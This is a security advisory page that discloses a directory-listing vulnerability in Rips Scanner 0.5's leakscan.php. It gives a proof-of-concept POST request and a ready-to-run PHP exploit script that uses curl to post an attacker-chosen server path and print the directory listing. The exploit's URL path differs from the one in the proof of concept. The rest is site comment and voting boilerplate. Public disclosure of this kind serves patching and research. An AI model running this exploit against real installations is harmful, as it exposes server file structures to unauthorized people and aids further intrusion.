Rips Scanner 0.5 - (leakscan.php) Directory Listing

2015.12.24
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php # Title : Rips Scanner 0.5 - (leakscan.php) Directory Listing # Vendor Homepage: https://github.com/robocoder/rips-scanner # Date: 24/12/2015 # Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip # Version : 0.5 # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/rips-leakscan.txt # Vulnerable File : leakscan.php # PoC : # http://127.0.1.1/rips/windows/leakscan.php # POST : loc=/var/www/html # PHP Exploit : # exploit.php http://localhost/rips /var/www/html $target = $argv[1]; $path = $argv[2]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "$target/a/ri/windows/leakscan.php"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "loc=$path"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "ni"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top